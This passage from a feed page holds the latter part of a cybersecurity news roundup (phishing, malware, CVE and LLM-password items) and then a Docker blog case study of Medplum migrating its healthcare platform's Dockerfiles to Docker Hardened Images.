    Threat actors are abusing the trust and reputation associated with Atlassian Jira Cloud and its connected email system to run automated spam campaigns and bypass traditional email security. To accomplish this, the operators created Atlassian Cloud trial accounts using randomized naming conventions, allowing them to generate disposable Jira Cloud instances at scale. "Emails were tailored to target specific language groups, targeting English, French, German, Italian, Portuguese, and Russian speakers — including highly skilled Russian professionals living abroad," Trend Micro said. "These campaigns not only distributed generic spam, but also specifically targeted sectors such as government and corporate entities." The attacks, active from late December 2025 through late January 2026, primarily targeted organizations using Atlassian Jira. The goal was to get recipients to open the emails and click on malicious links, which would initiate a redirect chain powered by the Keitaro Traffic Distribution System (TDS) and then finally lead them to pages peddling investment scams and online casino landing sites, suggesting that financial gain was likely the main objective.

  10. GitLab SSRF now federally mandated patch

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA), on February 18, 2026, added CVE-2021-22175 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patch by March 11, 2026. "GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled," CISA said. In March 2025, GreyNoise revealed that a cluster of about 400 IP addresses was actively exploiting multiple SSRF vulnerabilities, including CVE-2021-22175, to target susceptible instances in the U.S., Germany, Singapore, India, Lithuania, and Japan.

  11. Telegram bots fuel Fortune 500 phishing

    An elusive, financially motivated threat actor dubbed GS7 has been targeting Fortune 500 companies in a new phishing campaign that leverages trusted company branding with lookalike websites aimed at harvesting credentials via Telegram bots. The campaign, codenamed Operation DoppelBrand, targets top financial institutions, including Wells Fargo, USAA, Navy Federal Credit Union, Fidelity Investments, and Citibank, as well as technology, healthcare, and telecommunications firms worldwide. Victims are lured through phishing emails and redirected to counterfeit pages where credentials are harvested and transmitted to Telegram bots controlled by the attacker. According to SOCRadar, the group itself, however, has a history stretching back to 2022. The threat actor is said to have registered more than 150 malicious domains in recent months using registrars such as NameCheap and OwnRegistrar, and routing traffic through Cloudflare to evade detection. GS7's end goals include not only harvesting credentials, but also downloading remote management and monitoring (RMM) tools like LogMeIn Resolve on victim systems to enable remote access or the deployment of malware. This has raised the possibility that the group may even act as an initial access broker (IAB), selling the access to ransomware groups or other affiliates.

  12. Remcos shifts to live C2 surveillance

    Phishing emails disguised as invoices, job offers, or government notices are being used to distribute a new variant of Remcos RAT to facilitate comprehensive surveillance and control over infected systems. "The latest Remcos variant has been observed exhibiting a significant change in behaviour compared to previous versions," Point Wild said. "Instead of stealing and storing data locally on the infected system, this variant establishes direct online command-and-control (C2) communication, enabling real-time access and control. In particular, it leverages the webcam to capture live video streams, allowing attackers to monitor targets remotely. This shift from local data exfiltration to live, online surveillance represents an evolution in Remcos’ capabilities, increasing the risk of immediate espionage and persistent monitoring."

  13. China-made vehicles restricted on bases

    Poland's Ministry of Defence has banned Chinese cars, and other motor vehicles equipped with technology to record position, images, or sound, from entering protected military facilities due to national security concerns and to "limit the risk of access to sensitive data." The ban also extends to connecting work phones to infotainment systems in motor vehicles produced in China. The ban isn't permanent: the Defence Ministry has called for the development of a vetting process to allow carmakers to undergo a security assessment that, if passed, can allow their vehicles to enter protected facilities. "Modern vehicles equipped with advanced communication systems and sensors can collect and transmit data, so their presence in protected zones requires appropriate safety regulations," the Polish Army said. "The measures introduced are preventive and comply with the practices of NATO countries and other allies to ensure the highest standards of defense infrastructure protection. They are part of a wider process of adapting security procedures to the changing technological environment and current requirements for the protection of critical infrastructure."

  14. DKIM replay fuels invoice scams

    Bad actors are abusing legitimate invoices and dispute notifications from trusted vendors, such as PayPal, Apple, DocuSign, and Dropbox Sign (formerly HelloSign), to bypass email security controls. "These platforms often allow users to enter a 'seller name' or add a custom note when creating an invoice or notification," Casey-owned INKY said. "Attackers abuse this functionality by inserting scam instructions and a phone number into those user-controlled fields. They then send the resulting invoice or dispute notice to an email address they control, ensuring the malicious content is embedded in a legitimate, vendor-generated message." Because these emails originate from a legitimate company, they bypass checks like Domain-based Message Authentication, Reporting and Conformance (DMARC). As soon as the legitimate email is received, the attacker proceeds to forward it to the intended targets, allowing the "authentic looking" message to land in the victims' inboxes. The attack is known as a DKIM replay attack.

  15. RMM abuse surges 277%

    A new report from Huntress has revealed that the abuse of Remote Monitoring and Management (RMM) software surged 277% year-over-year, accounting for 24% of all observed incidents. Threat actors have begun to increasingly favor these tools because they are ubiquitous in enterprise environments, and the trusted nature of the RMM software allows malicious activity to blend in with legitimate usage, making detection harder for defenders. They also offer increased stealth, persistence, and operational efficiency. "As cybercriminals built entire playbooks around these legitimate, trusted tools to drop malware, steal credentials, and execute commands, the use of traditional hacking tools plummeted by 53%, while remote access trojans and malicious scripts dropped by 20% and 11.7%, respectively," the company said.

  16. Texas targets China-linked tech firms

    Texas Attorney General Ken Paxton has sued TP-Link for "deceptively marketing its networking devices and allowing the Chinese Communist Party ('CCP') to access American consumers' devices in their homes." Paxton's lawsuit alleges that TP-Link's products have been used by Chinese hacking groups to launch cyber attacks against the U.S. and that the company is subject to Chinese data laws, which it said require firms operating in the country to support its intelligence services by "divulging Americans' data." In a second lawsuit, Paxton also accused Anzu Robotics of misleading Texas consumers about the "origin, data practices, and security risks of its drones." Paxton's office described the company's products as a "21st century Trojan horse linked to the CCP."

  17. MetaMask backdoor expands DPRK campaign

    The North Korea-linked campaign known as Contagious Interview is designed to target IT professionals working in cryptocurrency, Web3, and artificial intelligence sectors to steal sensitive data and financial information using malware such as BeaverTail and InvisibleFerret. However, recent iterations of the campaign have expanded their data theft capabilities by tampering with the MetaMask wallet extension (if it's installed) through a lightweight JavaScript backdoor that shares the same functionality as InvisibleFerret, according to security researcher Seongsu Park. "Through the backdoor, attackers instruct the infected system to download and install a fake version of the popular MetaMask cryptocurrency wallet extension, complete with a dynamically generated configuration file that makes it appear legitimate," Park said. "Once installed, the compromised MetaMask extension silently captures the victim's wallet unlock password and transmits it to the attackers’ command-and-control server, giving them complete access to cryptocurrency funds."

  18. Booking.com kits hit hotels, guests

    Bridewell has warned of a resurgence in malicious activity targeting the hotel and retail sector. "The primary motivation driving this incident is financial fraud, targeting two victims: hotel businesses and hotel customers, in sequential order," security researcher Joshua Penny said. "The threat actor(s) utilize impersonation of the Booking.com platform through two distinct phishing kits dedicated to harvesting credentials and banking information from each victim, respectively." It's worth noting that the activity shares overlap with a prior activity wave disclosed by Sekoia in November 2025, although the use of a dedicated phishing kit is a new approach by either the same or new operators.

  19. EPMM exploits enable persistent access

    The recently disclosed security flaws in Ivanti Endpoint Manager Mobile (EPMM) have been exploited by bad actors to establish a reverse shell, deliver JSP web shells, conduct reconnaissance, and download malware, including Nezha, cryptocurrency miners, and backdoors for remote access. The two critical vulnerabilities, CVE-2026-1281 and CVE-2026-1340, allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials. According to Palo Alto Networks Unit 42, the campaign has affected state and local government, healthcare, manufacturing, professional and legal services, and high technology sectors in the U.S., Germany, Australia, and Canada. "Threat actors are accelerating operations, moving from initial reconnaissance to deploying dormant backdoors designed to maintain long-term access even after organizations apply patches," the cybersecurity company said. In a related development, Germany's Federal Office for Information Security (BSI) has reported evidence of exploitation since the summer of 2025 and has urged organizations to audit their systems for indicators of compromise (IoCs) as far back as July 2025.

  20. AI passwords lack true randomness

    New research by Irregular has found that passwords generated directly by a large language model (LLM) may appear strong but are fundamentally insecure, as "LLMs are designed to predict tokens – the opposite of securely and uniformly sampling random characters." The artificial intelligence (AI) security company said it detected LLM-generated passwords in the real world as part of code development tasks instead of leaning on traditional secure password generation methods. "People and coding agents should not rely on LLMs to generate passwords," the company said. "LLMs are optimized to produce predictable, plausible outputs, which is incompatible with secure password generation. AI coding agents should be directed to use secure password generation methods instead of relying on LLM-output passwords. Developers using AI coding assistants should review generated code for hardcoded credentials and ensure agents use cryptographically secure methods or established password managers."
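The fix the researchers recommend is straightforward: sample characters uniformly with a cryptographically secure random number generator instead of asking a model to predict them. A minimal Python sketch using the standard library's secrets module (the function name and defaults here are illustrative):

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Uniformly sample each character with a CSPRNG (secrets),
    instead of letting an LLM 'predict' a plausible-looking password."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

# For API keys and session tokens rather than human-typed passwords,
# secrets.token_urlsafe(32) is simpler still.
```

Unlike LLM output, every character here is drawn independently and uniformly, so the entropy is exactly what the alphabet size and length imply.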

  21. PDF engine flaws enable account takeover

    Cybersecurity researchers have discovered more than a dozen vulnerabilities (CVE-2025-70401, CVE-2025-70402, and CVE-2025-66500) in popular PDF platforms from Foxit and Apryse, potentially allowing attackers to exploit them for account takeover, session hijacking, data exfiltration, and arbitrary JavaScript execution. "Rather than isolated bugs, the issues cluster around recurring architectural failures in how PDF platforms handle untrusted input across layers," Novee Security researchers Lidor Ben Shitrit, Elad Meged, and Avishai Fradlis said. "Several vulnerabilities were exploitable with a single request and affected trusted domains commonly embedded inside enterprise applications." The issues have been addressed by both Apryse and Foxit through product updates.

  22. Training labs expose cloud backdoors

    A "widespread" security issue has been discovered where security vendors inadvertently expose deliberately vulnerable training applications, such as OWASP Juice Shop, DVWA, bWAPP, and Hackazon, to the public internet. This can open organizations to severe security risks when they are executed from a privileged cloud account. "Primarily deployed for internal testing, product demonstrations, and security training, these applications were frequently left accessible in their default or misconfigured states," Pentera Labs said. "These critical flaws not only allowed attackers full control over the compromised compute engine but also provided pathways for lateral movement into sensitive internal systems. Violations of the principle of least privilege and inadequate sandboxing measures further facilitated privilege escalation, endangering critical infrastructure and sensitive organizational data." Further analysis has determined that threat actors are exploiting this blind spot to plant web shells, cryptocurrency miners, and persistence mechanisms on compromised systems.

  23. Evasion loader refines C2 stealth

    The malware loader known as Oyster (aka Broomstick or CleanUpLoader) has continued to evolve into early 2026, fine-tuning its C2 infrastructure and obfuscation methods, per findings from Sekoia. The malware is distributed mainly through fake websites that distribute installers for legitimate software like Microsoft Teams, with the core payload often deployed as a DLL for persistent execution. "The initial stage leverages excessive legitimate API call hammering and simple anti-debugging traps to thwart static analysis," the company said. "The core payload is delivered in a highly obfuscated manner. The final stage implements a robust C2 communication protocol that features a dual-layer server infrastructure and highly-customized data encoding."

  24. Stealer taunts researchers in code

    Noodlophile is the name given to an information-stealing malware that has been distributed via fake AI tools promoted on Facebook. Assessed to be the work of a threat actor based in Vietnam, it was first documented by Morphisec in May 2025. Since then, there have been other reports detailing various campaigns, such as UNC6229 and PXA Stealer, orchestrated by Vietnamese cybercriminals. Morphisec's latest analysis of Noodlophile has revealed that the threat actor "padded the malware with millions of repeats of a colorful Vietnamese phrase translating to 'f*** you, Morphisec,'" suggesting that the operators were not thrilled about getting exposed. "Not just to vent frustration over disrupted campaigns, but also to bloat the file and crash AI-based analysis tools that are based on the Python disassemble library – dis.dis(obj)," security researcher Michael Gorelik said.

  25. Crypto library RCE risk patched

    The OpenSSL project has patched a stack buffer overflow flaw that can lead to remote code execution attacks under certain conditions. The vulnerability, tracked as CVE-2025-15467, resides in how the library processes Cryptographic Message Syntax data. Threat actors can use CMS packets with maliciously crafted AEAD parameters to crash OpenSSL and run malicious code. CVE-2025-15467 is one of 12 issues that were disclosed by AISLE late last month. Another high-severity vulnerability is CVE-2025-11187, which could trigger a stack-based buffer overflow due to a missing validation.

  26. Machine accounts expand delegation risk

    New research from Silverfort has dispelled a "common assumption" by showing that Kerberos delegation -- which allows a service to request resources or perform actions on behalf of a user -- applies not just to human users but also to machine accounts. In other words, delegation can be performed on behalf of highly privileged machine identities such as domain controllers. "That means a service trusted for delegation can act not just on behalf of other users, but also on behalf of machine accounts, the most critical non-human identities (NHIs) in any domain," Silverfort researcher Dor Segal said. "The risk is obvious. If an adversary can leverage delegation, it can act on behalf of sensitive machine accounts, which in many environments hold privileges equivalent to Domain Administrator." To counter the risk, it's advised to run Set-ADAccountControl -Identity "HOST01$" -AccountNotDelegated $true for each sensitive machine account.



from The Hacker News https://ift.tt/MVv5Ftb
via IFTTT

How Medplum Secured Their Healthcare Platform with Docker Hardened Images (DHI)

Special thanks to Cody Ebberson and the Medplum team for their open-source contribution and for sharing their migration experience with the community. A real-world example of migrating a HIPAA-compliant EHR platform to DHI with minimal code changes.

Healthcare software runs on trust. When patient data is at stake, security isn’t just a feature but a fundamental requirement. For healthcare platform providers, proving that trust to enterprise customers is an ongoing challenge that requires continuous investment in security posture, compliance certifications, and vulnerability management.

That’s why we’re excited to share how Medplum, an open-source healthcare platform serving over 20 million patients, recently migrated to Docker Hardened Images (DHI). This migration demonstrates exactly what we designed DHI to deliver: enterprise-grade security with minimal friction. Medplum’s team made the switch with just 54 lines of changes across 5 files—a near net-zero code change that dramatically improved their security posture.

Medplum is a headless EHR—the platform handles patient data, clinical workflows, and compliance so developers can focus on building healthcare apps. Built by and for healthcare developers, the platform provides:

  • HIPAA and SOC2 compliance out of the box
  • FHIR R4 API for healthcare data interoperability
  • Self-hosted or managed deployment options
  • Support for 20+ million patients across hundreds of practices

With over 500,000 pulls on Docker Hub for their medplum-server image, Medplum has become a trusted foundation for healthcare developers worldwide. As an open-source project licensed under Apache 2.0, their entire codebase—including Docker configurations—is publicly available on GitHub. This transparency made their DHI migration a perfect case study for the community.

[Diagram: Medplum as a headless EHR, handling patient data, clinical workflows, and compliance so developers can focus on building healthcare apps.]

Medplum is developer-first. It’s not a plug-and-play low-code tool—it’s designed for engineering teams that want a strong FHIR-based foundation with full control over the codebase.

The Challenge: Vulnerability Noise and Security Toil

Healthcare software development comes with unique challenges. Integration with existing EHR systems, compliance with regulations like HIPAA, and the need for robust security all add complexity and cost to development cycles.

“The Medplum team found themselves facing a challenge common to many high-growth platforms: ‘Vulnerability Noise.’ Even with lean base images, standard distributions often include non-essential packages that trigger security flags during enterprise audits. For a company helping others achieve HIPAA compliance, every ‘Low’ or ‘Medium’ CVE (Common Vulnerabilities and Exposures) requires investigation and documentation, creating significant ‘security toil’ for their engineering team.”

Reshma Khilnani

CEO, Medplum

Medplum addresses this by providing a compliant foundation. But even with that foundation, their team found themselves facing another challenge common to high-growth platforms: “Vulnerability Noise.”

Healthcare is one of the most security-conscious industries. Medplum’s enterprise customers—including Series C and D funded digital health companies—don’t just ask about security; they actively verify it. These customers routinely scan Medplum’s Docker images as part of their security due diligence.

Even with lean base images, standard distributions often include non-essential packages that trigger security flags during enterprise audits. For a company helping others achieve HIPAA compliance, every “Low” or “Medium” CVE requires investigation and documentation. This creates significant “security toil” for their engineering team.

The First Attempt: Distroless

This wasn’t Medplum’s first attempt at solving the problem. Back in November 2024, the team investigated Google’s distroless images as a potential solution.

The motivations were similar to what DHI would later deliver:

  • Less surface area in production images, and therefore less CVE noise
  • Smaller images for faster deployments
  • Simpler build process without manual hardening scripts

The idea was sound. Distroless images strip away everything except the application runtime—no shell, no package manager, minimal attack surface. On paper, it was exactly what Medplum needed.

But the results were mixed. Image sizes actually increased. Build times went up. There were concerns about multi-architecture support for native dependencies. The PR was closed without merging.

The core problem remained: many CVEs in standard images simply aren’t actionable. Often there isn’t a fix available, so all you can do is document and explain why it doesn’t apply to your use case. And often the vulnerability is in a corner of the image you’re not even using—like Perl, which comes preinstalled on Debian but serves no purpose in a Node.js application.

Fully removing these unused components is the only real answer. The team knew they needed hardened images. They just hadn’t found the right solution yet.

The Solution: Docker Hardened Images

When Docker made Hardened Images freely available under Apache 2.0, Medplum’s team saw an opportunity to simplify their security posture while maintaining compatibility with their existing workflows.

By switching to Docker Hardened Images, Medplum was able to offload the repetitive work of OS-level hardening—like configuring non-root users and stripping out unnecessary binaries—to Docker. This allowed them to provide their users with a “Secure-by-Default” image that meets enterprise requirements without adding complexity to their open-source codebase.

This shift is particularly significant for an open-source project. Rather than maintaining custom hardening scripts that contributors need to understand and maintain, Medplum can now rely on Docker’s expertise and continuous maintenance. The security posture improves automatically with each DHI update, without requiring changes to Medplum’s Dockerfiles.

“By switching to Docker Hardened Images, Medplum was able to offload the repetitive work of OS-level hardening—like configuring non-root users and stripping out unnecessary binaries—to Docker. This allowed them to provide their users with a ‘Secure-by-Default’ image that meets enterprise requirements without adding complexity to their open-source codebase.”

Cody Ebberson

CTO, Medplum

The Migration: Real Code Changes

The migration was remarkably clean. Previously, Medplum’s Dockerfile required manual steps to ensure security best practices. By moving to DHI, they could simplify their configuration significantly.

Let’s look at what actually changed. Here’s the complete server Dockerfile after the migration:

# Medplum production Dockerfile
# Uses Docker "Hardened Images":
# https://hub.docker.com/hardened-images/catalog/dhi/node/guides

# Supported architectures: linux/amd64, linux/arm64

# Stage 1: Build the application and install production dependencies
FROM dhi.io/node:24-dev AS build-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
ADD ./medplum-server-metadata.tar.gz ./
RUN npm ci --omit=dev && \
  rm package-lock.json

# Stage 2: Create the runtime image
FROM dhi.io/node:24 AS runtime-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
COPY --from=build-stage /usr/src/medplum/ ./
ADD ./medplum-server-runtime.tar.gz ./

EXPOSE 5000 8103

ENTRYPOINT [ "node", "--require", "./packages/server/dist/otel/instrumentation.js", "packages/server/dist/index.js" ]

Notice what’s not there:

  • No groupadd or useradd commands — DHI runs as non-root by default
  • No chown commands — permissions are already correct
  • No USER directive — the default user is already non-privileged

Before vs. After: Server Dockerfile

Before (node:24-slim):

FROM node:24-slim
ENV NODE_ENV=production
WORKDIR /usr/src/medplum

ADD ./medplum-server.tar.gz ./

# Install dependencies, create non-root user, and set permissions
RUN npm ci && \
  rm package-lock.json && \
  groupadd -r medplum && \
  useradd -r -g medplum medplum && \
  chown -R medplum:medplum /usr/src/medplum

EXPOSE 5000 8103

# Switch to the non-root user
USER medplum

ENTRYPOINT [ "node", "--require", "./packages/server/dist/otel/instrumentation.js", "packages/server/dist/index.js" ]

After (dhi.io/node:24):

FROM dhi.io/node:24-dev AS build-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
ADD ./medplum-server-metadata.tar.gz ./
RUN npm ci --omit=dev && rm package-lock.json

FROM dhi.io/node:24 AS runtime-stage
ENV NODE_ENV=production
WORKDIR /usr/src/medplum
COPY --from=build-stage /usr/src/medplum/ ./
ADD ./medplum-server-runtime.tar.gz ./

EXPOSE 5000 8103

ENTRYPOINT [ "node", "--require", "./packages/server/dist/otel/instrumentation.js", "packages/server/dist/index.js" ]

The migration also introduced a cleaner multi-stage build pattern, separating metadata (package.json files) from runtime artifacts.
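To make the split concrete, here is a rough sketch of how the two archives might be assembled. The file names and layout are hypothetical, for illustration only; Medplum’s actual packaging scripts may differ.

```shell
# Hypothetical packaging sketch: build a demo tree, then split it into
# a "metadata" archive (manifests only) and a "runtime" archive (build output).
mkdir -p demo/packages/server/dist
echo '{"name":"medplum"}' > demo/package.json
echo '{}' > demo/package-lock.json
echo '{"name":"server"}' > demo/packages/server/package.json
echo 'console.log("ok")' > demo/packages/server/dist/index.js

# Metadata archive: only the manifests that `npm ci` needs in the build stage.
tar -czf medplum-server-metadata.tar.gz -C demo \
  package.json package-lock.json packages/server/package.json

# Runtime archive: the compiled output, ADDed in the runtime stage.
tar -czf medplum-server-runtime.tar.gz -C demo packages/server/dist
```

Because `ADD` auto-extracts local tarballs, each stage unpacks only what it needs: the build stage resolves dependencies from the manifests, and the runtime stage layers the compiled artifacts on top.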

Before vs. After: App Dockerfile (Nginx)

The web app migration was even more dramatic:

Before (nginx-unprivileged:alpine):

FROM nginxinc/nginx-unprivileged:alpine

# Start as root for permissions
USER root

COPY <<EOF /etc/nginx/conf.d/default.conf
# ... nginx config ...
EOF

ADD ./medplum-app.tar.gz /usr/share/nginx/html
COPY ./docker-entrypoint.sh /docker-entrypoint.sh

# Manual permission setup
RUN chown -R 101:101 /usr/share/nginx/html && \
    chown 101:101 /docker-entrypoint.sh && \
    chmod +x /docker-entrypoint.sh

EXPOSE 3000

# Switch back to non-root
USER 101

ENTRYPOINT ["/docker-entrypoint.sh"]

After (dhi.io/nginx:1):

FROM dhi.io/nginx:1

COPY <<EOF /etc/nginx/nginx.conf
# ... nginx config ...
EOF

ADD ./medplum-app.tar.gz /usr/share/nginx/html
COPY ./docker-entrypoint.sh /docker-entrypoint.sh

EXPOSE 3000

ENTRYPOINT ["/docker-entrypoint.sh"]

Results: Improved Security Posture

After merging the changes, Medplum’s team shared their improved security scan results. The migration to DHI resulted in:

  • Dramatically reduced CVE count – DHI’s minimal base means fewer packages to patch
  • Non-root by default – No manual user configuration required
  • No shell access in production – Reduced attack surface for container escape attempts
  • Continuous patching – All DHI images are rebuilt when upstream security updates are available

For organizations that require stronger guarantees, Docker Hardened Images Enterprise adds SLA-backed remediation timelines, image customizations, and FIPS/STIG variants.

Most importantly, all of this was achieved with zero functional changes to the application. The same tests passed, the same workflows worked, and the same deployment process applied.

CI/CD Integration

Medplum also updated their GitHub Actions workflow to authenticate with the DHI registry:

- name: Login to Docker Hub
  uses: docker/login-action@v2.2.0
  with:
    username: $
    password: $

- name: Login to Docker Hub Hardened Images
  uses: docker/login-action@v2.2.0
  with:
    registry: dhi.io
    username: $
    password: $

This allows their CI/CD pipeline to pull hardened base images during builds. The same Docker Hub credentials work for both standard and hardened image registries.
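A build-and-push step following those logins might look like the sketch below. The action version, context, and tag are assumptions for illustration, not taken from Medplum’s workflow, and the multi-platform build assumes a prior docker/setup-buildx-action step.

```yaml
# Hypothetical build-and-push step; tags and context are illustrative.
- name: Build and push server image
  uses: docker/build-push-action@v5
  with:
    context: .
    platforms: linux/amd64,linux/arm64
    push: true
    tags: medplum/medplum-server:latest
```

Because the `FROM` lines reference dhi.io directly, no other workflow changes are needed; the builder pulls the hardened bases using the dhi.io login above.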

The Multi-Stage Pattern for DHI

One pattern worth highlighting from Medplum’s migration is the use of multi-stage builds with DHI variants:

  1. Build stage: Use dhi.io/node:24-dev which includes npm/yarn for installing dependencies
  2. Runtime stage: Use dhi.io/node:24 which is minimal and doesn’t include package managers

This pattern ensures that build tools never make it into the production image, further reducing the attack surface. It’s a best practice for any containerized Node.js application, and DHI makes it straightforward by providing purpose-built variants for each stage.

Medplum’s Production Architecture

Medplum’s hosted offering runs on AWS using containerized workloads. Their medplum/medplum-server image—built on DHI base images—now deploys to production.

Medplum production architecture

Here’s how the build-to-deploy flow works:

  1. Build time: GitHub Actions pulls dhi.io/node:24-dev and dhi.io/node:24 as base images
  2. Push: The resulting hardened image is pushed to medplum/medplum-server on Docker Hub
  3. Deploy: AWS Fargate pulls medplum/medplum-server:latest and runs the hardened container

The deployed containers inherit all DHI security properties—non-root execution, minimal attack surface, no shell—because they’re built on DHI base images. This demonstrates that DHI works seamlessly with production-grade infrastructure including:

  • AWS Fargate/ECS for container orchestration
  • Elastic Load Balancing for high availability
  • Aurora PostgreSQL for managed database
  • ElastiCache for Redis caching
  • CloudFront for CDN and static assets

No infrastructure changes were required. The same deployment pipeline, the same Fargate configuration—just a more secure base image.

Why This Matters for Healthcare

For healthcare organizations evaluating container security, Medplum’s migration offers several lessons:

1. Eliminating “Vulnerability Noise”

The biggest win from DHI isn’t just security; it’s reducing the operational burden of security. Fewer packages mean fewer CVEs to investigate, document, and explain to customers. For teams without dedicated security staff, this reclaimed time is invaluable.

2. Compliance-Friendly Defaults

HIPAA requires covered entities to implement technical safeguards including access controls and audit controls. DHI’s non-root default and minimal attack surface align with these requirements out of the box. For companies pursuing SOC 2 Type 2 certification—which Medplum implemented from Day 1—or HITRUST certification, DHI provides a stronger foundation for the technical controls auditors evaluate.

3. Reduced Audit Surface

When security teams audit container configurations, DHI provides a cleaner story. Instead of explaining custom hardening scripts or why certain CVEs don’t apply, teams can point to Docker’s documented hardening methodology, SLSA Level 3 provenance, and independent security validation by SRLabs. This is particularly valuable during enterprise sales cycles where customers scan vendor images as part of due diligence.

4. Practicing What You Preach

For platforms like Medplum that help customers achieve compliance, using hardened images isn’t just good security—it’s good business. When you’re helping healthcare organizations meet regulatory requirements, your own infrastructure needs to set the example.

5. Faster Security Response

With DHI Enterprise, critical CVEs are patched within 7 days. For healthcare organizations where security incidents can have regulatory implications, this SLA provides meaningful risk reduction—and a concrete commitment to share with customers.

Conclusion

Medplum’s migration to Docker Hardened Images demonstrates that improving container security doesn’t have to be painful. With minimal code changes—54 additions and 52 deletions—they achieved:

  • Secure-by-Default images that meet enterprise requirements
  • Automatic non-root execution
  • Dramatically reduced CVE surface
  • Simplified Dockerfiles with no manual hardening scripts
  • Less “security toil” for their engineering team
  • A stronger compliance story for enterprise customers

By offloading OS-level hardening to Docker, Medplum can focus on what they do best—building healthcare infrastructure—while their security posture improves automatically with each DHI update.

For a platform with 500,000+ Docker Hub pulls serving healthcare organizations worldwide, this migration shows that DHI is ready for production workloads at scale. More importantly, it shows that security improvements can actually reduce operational burden rather than add to it.

For platforms helping others achieve compliance, practicing what you preach matters. With Docker Hardened Images, that just got a lot easier.

Ready to harden your containers? Explore the Docker Hardened Images documentation or browse the free DHI catalog to find hardened versions of your favorite base images.
